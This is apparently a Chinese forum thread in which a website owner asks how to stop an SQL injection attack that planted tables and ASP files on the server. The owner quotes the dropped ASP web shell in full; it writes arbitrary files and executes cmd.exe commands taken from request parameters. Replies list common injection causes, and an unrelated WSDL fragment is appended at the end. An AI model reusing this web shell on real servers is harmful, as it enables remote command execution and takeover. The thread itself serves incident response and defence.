注入了四个表
d99_cmd,d99_reg,d99_tmp,pangolin_test_table
在网站的根目录里注入了四个文件
98.asp,315.asp,db.asp,le.asp
在我的C盘里注入了一个cpand99.txt文件
它的内容是:
<%Dim objFSO%>
<%Dim fdata%>
<%Dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%else%>
<%end if%>
<%err.clear%>
<%end if%>
<%Set objFSO = Nothing%>
<%=server.createobject("wscript.shell").exec("cmd.exe /c" &request("c")).stdout.readall%>
我看了一下日志.是通过url用sql注入的.我想问一下我能不能通过重写一个url把这个解决掉.
还是就是能不能有别的办法不要再让它向里面写文件了.我网站已经把everyone 用户删除了.其它的用户也只有read的权限.可还是注入了.请高手救命呀!
不知道被注入的 URL 是什么?具体的其他参数?你的业务处理和数据过程?
url参数没过滤
sql存储过程没使用
文件上传类型识别不彻底
站内搜索框参数没过滤
.....
检查程序里面有没有拼接
在asp里怎么调用java写的webservice方法,有很多方法
- <message name="RtPnrIn">
<part name="bstrPnrNO" type="s:string" />
<part name ......
